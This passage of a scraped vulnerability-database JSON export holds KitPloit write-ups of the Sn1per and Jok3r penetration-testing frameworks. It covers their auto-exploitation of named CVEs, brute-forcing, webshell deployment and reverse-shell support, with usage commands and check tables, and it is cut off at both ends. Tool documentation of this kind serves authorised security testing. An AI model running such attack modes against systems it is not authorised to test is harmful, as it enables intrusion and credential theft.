"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:17:53", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-11-24T12:43:00", "type": "kitploit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-11-24T12:43:00", "id": "KITPLOIT:8672599587089685905", "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:17:44", "description": "[](<https://2.bp.blogspot.com/-b-yEHDNsbTk/XEN8U7E8E2I/AAAAAAAAN8A/cGC9Z8NjoSUkGMyEFR9xJYU2XISstK8EgCLcBGAs/s1600/jok3r_1_logo.png>)\n\n \n_Jok3r_ is a Python3 CLI application which is aimed at **helping penetration testers for network infrastructure and web black-box security tests**. \nIts main goal is to **save time on everything that can be automated during network/web pentest in order to enjoy more time on more interesting and challenging stuff**. \nTo achieve that, it **combines open-source Hacking tools to run various security checks against all common network services.** \n** \n** [](<https://draft.blogger.com/null>) \n**Main features** \n**Toolbox management**: \n\n\n * Install automatically all the hacking tools used by _Jok3r_,\n * Keep the toolbox up-to-date,\n * Easily add new tools.\n**Attack automation**: \n\n\n * Target most common network services (including web),\n * Run security checks by chaining hacking tools, following standard process (Reconaissance, Vulnerability scanning, Exploitation, Account bruteforce, (Basic) Post-exploitation).\n * Let _Jok3r_ automatically choose the checks to run according to the context and knowledge about the target,\n**Mission management / Local database**: \n\n\n * Organize targets by missions in local database,\n * Fully manage missions and targets (hosts/services) via interactive shell (like msfconsole db),\n * Access results from security checks.\n_Jok3r_ has been built with the ambition to be easily and quickly customizable: Tools, security checks, supported network services... can be easily added/edited/removed by editing settings files with an easy-to-understand syntax. \n \n[](<https://draft.blogger.com/null>) \n**Installation** \n**The recommended way to use Jok3r is inside a Docker container so you will not have to worry about dependencies issues and installing the various hacking tools of the toolbox.** \n \nA Docker image is available on Docker Hub and automatically re-built at each update: <https://hub.docker.com/r/koutto/jok3r/>. It is initially based on official Kali Linux Docker image (kalilinux/kali-linux-docker). \n \n**Pull Jok3r Docker Image:** \n\n \n \n sudo docker pull koutto/jok3r\n\n**Run fresh Docker container:** \n\n \n \n sudo docker run -i -t --name jok3r-container -w /root/jok3r --net=host koutto/jok3r\n\n**Important: --net=host option is required to share host's interface. It is needed for reverse connections (e.g. Ping to container when testing for RCE, Get a reverse shell)** \nJok3r and its toolbox is ready-to-use ! \n\n\n * To re-run a stopped container:\n \n \n sudo docker start -i jok3r-container\n\n * To open multiple shells inside the container:\n \n \n sudo docker exec -it jok3r-container bash\n\nFor information about building your own Docker image or installing _Jok3r_ on your system without using Docker, refer to <https://jok3r.readthedocs.io/en/latest/installation.html> \n \n[](<https://draft.blogger.com/null>) \n**Quick usage examples** \n**Show all the tools in the toolbox** \n\n \n \n python3 jok3r.py toolbox --show-all\n\n**Install all the tools in the toolbox** \n\n \n \n python3 jok3r.py toolbox --install-all --fast\n\n**Update all the tools in the toolbox** \n\n \n \n python3 jok3r.py toolbox --update-all --fast\n\n**List supported services** \n\n \n \n python3 jok3r.py info --services\n\n**Show security checks for HTTP** \n\n \n \n python3 jok3r.py info --checks http\n\n**Create a new mission in local database** \n\n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission -a MayhemProject\n \n [+] Mission \"MayhemProject\" successfully added\n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]>\n\n**Run security checks against an URL and add results to the mission** \n\n \n \n python3 jok3r.py attack -t https://www.example.com/webapp/ --add MayhemProject\n\n**Run security checks against a MSSQL service (without user-interaction) and add results to the mission** \n\n \n \n python3 jok3r.py attack -t 192.168.1.42:1433 -s mssql --add MayhemProject --fast\n\n**Import hosts/services from Nmap results into the mission scope** \n\n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission MayhemProject\n \n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]> nmap results.xml\n\n**Run security checks against all services in the given mission and store results in the database** \n\n \n \n python3 jok3r.py attack -m MayhemProject --fast\n\n**Run security checks against only FTP services running on ports 21/tcp and 2121/tcp from the mission** \n\n \n \n python3 jok3r.py attack -m MayhemProject -f \"port=21,2121;service=ftp\" --fast\n\n**Run security checks against only FTP services running on ports 2121/tcp and all HTTP services on 192.168.1.42 from the mission** \n\n \n \n python3 jok3r.py attack -m MayhemProject -f \"port=2121;service=ftp\" -f \"ip=192.168.1.42;service=http\"\n\n[](<https://draft.blogger.com/null>) \n \n**Typical usage example** \nYou begin a pentest with several servers in the scope. Here is a typical example of usage of _JoK3r_: \n\n\n 1. You run _Nmap_ scan on the servers in the scope.\n 2. You create a new mission (let's say \"MayhemProject\") in the local database:\n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission -a MayhemProject\n \n [+] Mission \"MayhemProject\" successfully added\n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]>\n\n 3. You import your results from _Nmap_ scan in the database:\n \n \n jok3rdb[MayhemProject]> nmap results.xml\n\n 4. You can then have a quick overview of all services and hosts in the scope, add some comments, add some credentials if you already have some knowledge about the targets (grey box pentest), and so on\n \n \n jok3rdb[MayhemProject]> hosts\n \n [...]\n \n jok3rdb[MayhemProject]> services\n \n [...]\n\n 5. Now, you can run security checks against some targets in the scope. For example, if you want to run checks against all Java-RMI services in the scope, you can run the following command:\n \n \n python3 jok3r.py attack -m MayhemProject -f \"service=java-rmi\" --fast\n\n 6. You can view the results from the security checks either in live when the tools are executed or later from the database using the following command:\n \n \n jok3rdb[MayhemProject]> results\n\n[](<https://draft.blogger.com/null>) \n \n**Full Documentation** \nDocumentation is available at: <https://jok3r.readthedocs.io/> \n \n[](<https://draft.blogger.com/null>) \n**Supported Services &amp; Security Checks ** \n**Lots of checks remain to be implemented and services must be added !! Work in progress ...** \n\n\n * [AJP (default 8009/tcp)](<https://github.com/koutto/jok3r#ajp-default-8009-tcp>)\n * [FTP (default 21/tcp)](<https://github.com/koutto/jok3r#ftp-default-21-tcp>)\n * [HTTP (default 80/tcp)](<https://github.com/koutto/jok3r#http-default-80-tcp>)\n * [Java-RMI (default 1099/tcp)](<https://github.com/koutto/jok3r#java-rmi-default-1099-tcp>)\n * [JDWP (default 9000/tcp)](<https://github.com/koutto/jok3r#jdwp-default-9000-tcp>)\n * [MSSQL (default 1433/tcp)](<https://github.com/koutto/jok3r#mssql-default-1433-tcp>)\n * [MySQL (default 3306/tcp)](<https://github.com/koutto/jok3r#mysql-default-3306-tcp>)\n * [Oracle (default 1521/tcp)](<https://github.com/koutto/jok3r#oracle-default-1521-tcp>)\n * [PostgreSQL (default 5432/tcp)](<https://github.com/koutto/jok3r#postgresql-default-5432-tcp>)\n * [RDP (default 3389/tcp)](<https://github.com/koutto/jok3r#rdp-default-3389-tcp>)\n * [SMB (default 445/tcp)](<https://github.com/koutto/jok3r#smb-default-445-tcp>)\n * [SMTP (default 25/tcp)](<https://github.com/koutto/jok3r#smtp-default-25-tcp>)\n * [SNMP (default 161/udp)](<https://github.com/koutto/jok3r#snmp-default-161-udp>)\n * [SSH (default 22/tcp)](<https://github.com/koutto/jok3r#ssh-default-22-tcp>)\n * [Telnet (default 21/tcp)](<https://github.com/koutto/jok3r#telnet-default-21-tcp>)\n * [VNC (default 5900/tcp)](<https://github.com/koutto/jok3r#vnc-default-5900-tcp>)\n\n \n\n\n[](<https://draft.blogger.com/null>) \n**AJP (default 8009/tcp)** \n\n \n \n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap AJP scripts | nmap |\n | tomcat-version | recon | Fingerprint Tomcat version through AJP | ajpy |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | default-creds-tomcat | bruteforce | Check [default credentials](<https://www.kitploit.com/search/label/Default%20Credentials>) for Tomcat Application Manager | ajpy |\n | deploy-webshell-tomcat | exploit | Deploy a webshell on Tomcat through AJP | ajpy |\n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n[](<https://draft.blogger.com/null>) \n**FTP (default 21/tcp)** \n\n \n \n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap FTP scripts | nmap |\n | nmap-vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | ftpmap-scan | vulnscan | Identify FTP server soft/version and check for known vulns | ftpmap |\n | common-creds | bruteforce | Check common credentials on FTP server | patator |\n | bruteforce-creds | bruteforce | Bruteforce FTP accounts | patator |\n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n[](<https://draft.blogger.com/null>) \n**HTTP (default 80/tcp)** \n\n \n \n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n | Name | Category | Description | Tool used |\n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n | nmap-recon | recon | Recon using Nmap HTTP scripts | nmap |\n | load-balancing-detection | recon | HTTP load balancer detection | halberd |\n | waf-detection | recon | Identify and fingerprint WAF products protecting website | wafw00f |\n | tls-probing | recon | Identify the implementation in use by SSL/TLS servers (might allow server fingerprinting) | tls-prober |\n | fingerprinting-multi-whatweb | recon | Identify CMS, blogging platforms, JS libraries, Web servers | whatweb |\n | fingerprinting-app-server | recon | Fingerprint application server (JBoss, ColdFusion, Weblogic, Tomcat, Railo, Axis2, Glassfish) | clusterd |\n | fingerprinting-server-domino | recon | Fingerprint IBM/Lotus Domino server | domiowned |\n | fingerprinting-cms-wig | recon | Identify several CMS and other administrative applications | wig |\n | fingerprinting-cms-cmseek | recon | Detect CMS (130+ supported), detect version on Drupal, advanced scan on Wordpress/Joomla | cmseek |\n | fingerprinting-cms-fingerprinter | recon | Fingerprint precisely CMS versions (based on files checksums) | fingerprinter |\n | fingerprinting-cms-cmsexplorer | recon | Find plugins and themes (using bruteforce) installed in a CMS (Wordpress, Drupal, Joomla, Mambo) | cmsexplorer |\n | fingerprinting-drupal | recon | Fingerprint Drupal 7/8: users, nodes, default files, modules, themes enumeration | drupwn |\n | crawling-fast | recon | Crawl website quickly, analyze interesting files/directories | dirhunt |\n | crawling-fast2 | recon | Crawl website and extract URLs, files, intel & endpoints | photon |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | ssl-check | vulnscan | Check for SSL/TLS configuration | testssl |\n | vulnscan-multi-nikto | vulnscan | Check for multiple web vulnerabilities/misconfigurations | nikto |\n | default-creds-web-multi | vulnscan | Check for default credentials on various web interfaces | changeme |\n | webdav-scan-davscan | vulnscan | Scan HTTP WebDAV | davscan |\n | webdav-scan-msf | vulnscan | Scan HTTP WebDAV | metasploit |\n | webdav-internal-ip-disclosure | vulnscan | Check for WebDAV internal IP disclosure | metasploit |\n | webdav-website-content | vulnscan | Detect webservers disclosing its content through WebDAV | metasploit |\n | http-put-check | vulnscan | Detect the support of dangerous HTTP PUT method | metasploit |\n | apache-optionsbleed-check | vulnscan | Test for the Optionsbleed bug in Apache httpd (CVE-2017-9798) | optionsbleed |\n | shellshock-scan | vulnscan | Detect if web server is vulnerable to Shellshock (CVE-2014-6271) | shocker |\n | iis-shortname-scan | vulnscan | Scan for IIS short filename (8.3) disclosure vulnerability | iis-shortname-scanner |\n | iis-internal-ip-disclosure | vulnscan | Check for IIS internal IP disclosure | metasploit |\n | tomcat-user-enum | vulnscan | Enumerate users on Tomcat 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18 | metasploit |\n | jboss-vulnscan-multi | vulnscan | Scan JBoss application server for multiple vulnerabilities | metasploit |\n | jboss-status-infoleak | vulnscan | Queries JBoss status servlet to collect [sensitive information](<https://www.kitploit.com/search/label/Sensitive%20Information>) (JBoss 4.0, 4.2.2 and 4.2.3) | metasploit |\n | jenkins-infoleak | vulnscan | Enumerate a remote Jenkins-CI installation in an unauthenticated manner | metasploit |\n | cms-multi-vulnscan-cmsmap | vulnscan | Check for vulnerabilities in CMS Wordpress, Drupal, Joomla | cmsmap |\n | wordpress-vulscan | vulnscan | Scan for vulnerabilities in CMS Wordpress | wpscan |\n | wordpress-vulscan2 | vulnscan | Scan for vulnerabilities in CMS Wordpress | wpseku |\n | joomla-vulnscan | vulnscan | Scan for vulnerabilities in CMS Joomla | joomscan |\n | joomla-vulnscan2 | vulnscan | Scan for vulnerabilities in CMS Joomla | joomlascan |\n | joomla-vulnscan3 | vulnscan | Scan for vulnerabilities in CMS Joomla | joomlavs |\n | drupal-vulnscan | vulnscan | Scan for vulnerabilities in CMS Drupal | droopescan |\n | magento-vulnscan | vulnscan | Check for misconfigurations in CMS Magento | magescan |\n | silverstripe-vulnscan | vulnscan | Scan for vulnerabilities in CMS Silverstripe | droopescan |\n | vbulletin-vulnscan | vulnscan | Scan for vulnerabilities in CMS vBulletin | vbscan |\n | liferay-vulnscan | vulnscan | Scan for vulnerabilities in CMS Liferay | liferayscan |\n | angularjs-csti-scan | vulnscan | Scan for AngularJS Client-Side Template Injection | angularjs-csti-scanner |\n | jboss-deploy-shell | exploit | Try to deploy shell on JBoss server (jmx|web|admin-console, JMXInvokerServlet) | jexboss |\n | struts2-rce-cve2017-5638 | exploit | Exploit Apache Struts2 Jakarta Multipart parser RCE (CVE-2017-5638) | jexboss |\n | struts2-rce-cve2017-9805 | exploit | Exploit Apache Struts2 REST Plugin XStream RCE (CVE-2017-9805) | struts-pwn-cve2017-9805 |\n | struts2-rce-cve2018-11776 | exploit | Exploit Apache Struts2 [misconfiguration](<https://www.kitploit.com/search/label/Misconfiguration>) RCE (CVE-2018-11776) | struts-pwn-cve2018-11776 |\n | tomcat-rce-cve2017-12617 | exploit | Exploit for Apache Tomcat JSP Upload Bypass RCE (CVE-2017-12617) | exploit-tomcat-cve2017-12617 |\n | jenkins-cliport-deserialize | exploit | Exploit Java deserialization in Jenkins CLI port | jexboss |\n | weblogic-t3-deserialize-cve2015-4852 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2015-4852) | loubia |\n | weblogic-t3-deserialize-cve2017-3248 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2017-3248) | exploit-weblogic-cve2017-3248 |\n | weblogic-t3-deserialize-cve2018-2893 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2018-2893) | exploit-weblogic-cve2018-2893 |\n | weblogic-wls-wsat-cve2017-10271 | exploit | Exploit WLS-WSAT in Weblogic - CVE-2017-10271 | exploit-weblogic-cve2017-10271 |\n | drupal-cve-exploit | exploit | Check and exploit CVEs in CMS Drupal 7/8 (include Drupalgeddon2) (require user interaction) | drupwn |\n | bruteforce-domino | bruteforce | Bruteforce against IBM/Lotus Domino server | domiowned |\n | bruteforce-wordpress | bruteforce | Bruteforce Wordpress accounts | wpseku |\n | bruteforce-joomla | bruteforce | Bruteforce Joomla account | xbruteforcer |\n | bruteforce-drupal | bruteforce | Bruteforce Drupal account | xbruteforcer |\n | bruteforce-opencart | bruteforce | Bruteforce Opencart account | xbruteforcer |\n | bruteforce-magento | bruteforce | Bruteforce Magento account | xbruteforcer |\n | web-path-bruteforce-targeted | bruteforce | Bruteforce web paths when language is known (extensions adapted) (use raft wordlist) | dirsearch |\n | web-path-bruteforce-blind | bruteforce | Bruteforce web paths when language is unknown (use raft wordlist) | wfuzz |\n | web-path-bruteforce-opendoor | bruteforce | Bruteforce web paths using OWASP OpenDoor wordlist | wfuzz |\n | wordpress-shell-upload | postexploit | Upload shell on Wordpress if admin credentials are known | wpforce |\n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n\n[](<https://draft.blogger.com/null>) \n**Java-RMI (default 1099/tcp)** \n\n \n \n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Attempt to dump all objects from Java-RMI service | nmap |\n | rmi-enum | recon | Enumerate RMI services | barmie |\n | jmx-info | recon | Get information about JMX and the MBean server | twiddle |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | jmx-bruteforce | bruteforce | Bruteforce creds to connect to JMX registry | jmxbf |\n | exploit-rmi-default-config | exploit | Exploit default config in RMI Registry to load classes from any remote URL (not working against JMX) | metasploit |\n | exploit-jmx-insecure-config | exploit | Exploit JMX insecure config. Auth disabled: should be vuln. Auth enabled: vuln if weak config | metasploit |\n | jmx-auth-disabled-deploy-class | exploit | Deploy malicious MBean on JMX service with auth disabled (alternative to msf module) | sjet |\n | tomcat-jmxrmi-deserialize | exploit | Exploit Java-RMI deserialize in Tomcat (CVE-2016-8735, CVE-2016-8735), req. JmxRemoteLifecycleListener | jexboss |\n | rmi-deserialize-all-payloads | exploit | Attempt to exploit Java deserialize against Java RMI Registry with all ysoserial payloads | ysoserial |\n | tomcat-jmxrmi-manager-creds | postexploit | Retrieve Manager creds on Tomcat JMX (req. auth disabled or creds known on JMX) | jmxploit |\n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n\n[](<https://draft.blogger.com/null>) \n**JDWP (default 9000/tcp)** \n\n \n \n +------------+----------+-----------------------------------------------------+-----------------+\n | Name | Category | Description | Tool used |\n +------------+----------+-----------------------------------------------------+-----------------+\n | nmap-recon | recon | Recon using Nmap JDWP scripts | nmap |\n | jdwp-rce | exploit | Gain RCE on JDWP service (show OS/Java info as PoC) | jdwp-shellifier |\n +------------+----------+-----------------------------------------------------+-----------------+\n\n[](<https://draft.blogger.com/null>) \n**MSSQL (default 1433/tcp)** \n\n \n \n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | nmap-recon | recon | Recon using Nmap MSSQL scripts | nmap |\n | mssqlinfo | recon | Get technical information about a remote MSSQL server (use TDS protocol and SQL browser Server) | msdat |\n | common-creds | bruteforce | Check common/default credentials on MSSQL server | msdat |\n | bruteforce-sa-account | bruteforce | Bruteforce MSSQL \"sa\" account | msdat |\n | audit-mssql-postauth | postexploit | Check permissive privileges, methods allowing command execution, weak accounts after authenticating on MSSQL | msdat |\n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n\n[](<https://draft.blogger.com/null>) \n**MySQL (default 3306/tcp)** \n\n \n \n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n | Name | Category | Description | Tool used |\n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n | nmap-recon | recon | Recon using Nmap MySQL scripts | nmap |\n | mysql-auth-bypass-cve2012-2122 | exploit | Exploit password bypass vulnerability in MySQL - CVE-2012-2122 | metasploit |\n | default-creds | bruteforce | Check default credentials on MySQL server | patator |\n | mysql-hashdump | postexploit | Retrieve usernames and password hashes from MySQL database (req. creds) | metasploit |\n | mysql-interesting-tables-columns | postexploit | Search for interesting tables and columns in database | jok3r-scripts |\n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n\n[](<https://draft.blogger.com/null>) \n**Oracle (default 1521/tcp)** \n\n \n \n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | tnscmd | recon | Connect to TNS Listener and issue commands Ping, Status, 